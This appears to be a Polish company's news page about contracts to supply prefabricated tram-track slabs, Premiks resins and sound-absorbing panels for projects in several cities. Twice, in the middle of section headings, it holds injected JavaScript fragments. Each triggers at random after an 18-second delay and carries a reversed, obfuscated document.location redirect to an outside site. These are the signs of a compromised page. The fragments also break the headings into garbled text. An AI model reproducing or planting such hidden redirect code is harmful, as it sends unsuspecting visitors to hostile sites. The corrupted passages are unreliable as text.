Przebudowa dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torowiska na ulicy Walczaka w Gorzowie Wielkopolskim

Firma ZUE S.A. jako główny wykonawca przebudowy torowiska w Gorzowie Wielkopolskim na ulicy Walczaka, złożył u nas zamówienie na wykonanie i dostawę prefabrykowanych płyt żelbetowych w systemie rowkowo – kształtowym RX. Rozwiązanie to zostało stworzone z myślą o umożliwieniu łatwego demontażu i ponownego montażu szyn, niezbędnego w sytuacji pęknięcia szyny lub jej zużycia eksploatacyjnego. Łączna długość toru w systemie RX będzie wynosić około 152 mtp.

Zawarcie umowy na dostawę płyt w systemie RZ

30 stycznia 2018 r. została podpisana umowa z Przedsiębiorstwem Inżynieryjnych Robót Kolejowych TOR-KRAK na dostawę prefabrykowanych płyt tramwajowych. Nasze płyty w systemie rowkowo-zalewowym RZ wykorzystane zostaną do przebudowy układu drogowo-torowego w ul. Dąbrowskiego w Łodzi na odcinku od al. Śmigłego Rydza do ul. Rzgowskiej. Łącznie będzie to ponad 1225 mtp. Jest to kolejny etap modernizacji tego torowiska, na które wcześniej dostarczaliśmy płyty dla MPK Łódź.

Przejazd na ulicy Kościuszkowców w Krakowie

W dniach 25-26.11.2017 podczas zamknięcia weekendowego wykonany został przejazd tramwajowy na ul. Kościuszkowców w Krakowie. Remont wykonany został w systemie rowkowo-zalewowym RZ, przy wykorzystaniu zestawu żywic Premiks. Dostarczone materiały Premiks zostały pozytywnie zaopiniowane przez wykonawcę.

Rozbudowa ulicy Igołomskiej w Krakowie

Wykonawca modernizacji torowiska tramwajowego w ul. Igołomskiej w Krakowie, firma ZUE S.A., prowadzi obecnie prace związane z układaniem naszych prefabrykowanych płyt tramwajowych systemu rowkowo-zalewowego RZ. W tej bezpodsypkowej konstrukcji torowiska docelowo ma powstać łącznie ponad 540 metrów pojedynczego toru. Zakończenie prac przy montażu płyt planowane jest na koniec bieżącego miesiąca.

Referencje dla systemu RP

Miło nam poinformować, że nawierzchnia torowo-drogowa w systemie rowkowo-przykręcanym RP, nagrodzona nagrodą im. prof. Jana Podoskiego, otrzymuje pozytywne opinie eksploatacyjne. Poniżej przedstawiamy referencje wystawione przez Tramwaje Śląskie dla przejazdu tramwajowego wykonanego w systemie RP przy ul. Piastowskiej w Będzinie. Przejazd ten użytkowany jest z powodzeniem od roku 2013. Treść pisma przedstawiamy w załączniku.

Przebudowa infrastruktury tramwajowej wzdłuż ul. Niedurnego w Rudzie Śląskiej

Z przyjemnością informujemy, że Wykonawca robót torowo-drogowych przy ul. Niedurnego w Rudzie Śląskiej zakończył montaż wszystkich dostarczonych przez nas płyt rowkowo-zalewowych RZ.
Kontrakt obejmował dostarczenie 900 metrów prefabrykowanych płyt torowych, w tym płyt specjalnych (kablowych i odwodnieniowych) oraz nietypowych płyt przystosowanych do montażu włazów studzienkowych.

Zawarcie umowy na dostawę zestawu żywic Premiks

W dniu 2017-07-04, w wyniku złożenia przez nas najkorzystniejszej oferty, podpisaliśmy z przedsiębiorstwem MPK-Łódź Sp. z o.o umowę na dostawę zestawu żywic Premiks, służącego do sprężystego mocowania szyn tramwajowych i uszczelniania nawierzchni drogowych.
Ww. umowa, o numerze WZ/WZ/U/267-00/17, związana jest z remontem torowiska tramwajowego w ul. Gdańskiej i Kopernika w Łodzi, do którego produkujemy również prefabrykowane płyty tramwajowe w odmianie blokowo-zalewowej BZ oraz ciągły, gumowy profil podkładowy.
Szacowana ilość zestawu Premiks jaką mamy dostarczyć w okresie lipiec-sierpień b.r. wynosi ponad 19 000 kg. Wyrób będzie zapakowany w tzw. zestawy beczkowe (180 kg), przeznaczone bezpośrednio do maszynowej aplikacji.

Zawarcie umowy na dostawę zrębkobedom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tonowych paneli dźwiękochłonnych EKA

Miło nam poinformować, że w ostatnich dniach zawarliśmy z Przedsiębiorstwem Usług Technicznych „INTERCOR” Sp. z o.o z Zawiercia umowę na dostawę naszych prefabrykowanych, zrębkobetonowych paneli dźwiękochłonnych EKA. Przedmiotowa umowa powiązana jest z budową ekranów dźwiękochłonnych w zadaniu pt. „Kontynuacja projektowania i rozbudowa drogi krajowej nr 8 do parametrów drogi ekspresowej na odcinku od węzła z drogą wojewódzką nr 579 w Radziejowicach do węzła „Paszków” z drogą wojewódzką nr 721 w Wolicy, w zakresie Zadania II – kontynuacja projektowania i rozbudowa drogi krajowej nr 8 do parametrów drogi ekspresowej, na odcinku Przeszkoda-Paszków o długości około 11,6 km”
Szacowana w umowie ilość paneli EKA wynosi 10 000 m2 a dostawy będą przez nas realizowane sukcesywnie do 2018 rok